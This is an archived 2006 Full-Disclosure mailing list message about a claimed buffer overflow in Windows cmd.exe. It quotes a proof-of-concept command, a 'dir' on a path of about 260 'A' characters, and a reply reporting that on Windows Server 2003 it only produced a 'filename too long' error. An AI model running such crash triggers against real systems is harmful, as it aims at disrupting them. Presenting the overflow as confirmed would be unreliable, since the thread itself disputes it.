lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <000b01c6f47e$904c6460$6601a8c0@snmovil>
Date: Fri, 20 Oct 2006 14:33:00 -0500
From: "Luis Alberto Cortes Zavala" <napasn@...uritynation.com>
To: <vuln-dev@...urityfocus.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows Command Processor CMD.EXE Buffer
	Overflow

YEah! Buffer Overflow Windows XP SP2

I Hill debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
napa@...uritynation.com
http://www.securitynation.com



-----Mensaje original-----
De: listbounce@...urityfocus.com [mailto:listbounce@...urityfocus.com] En
nombre de The SNiFF
Enviado el: Viernes, 20 de Octubre de 2006 03:58 a.m.
Para: vuln-dev@...urityfocus.com
Asunto: Re: Windows Command Processor CMD.EXE Buffer Overflow

> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)

Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K 
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long. 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ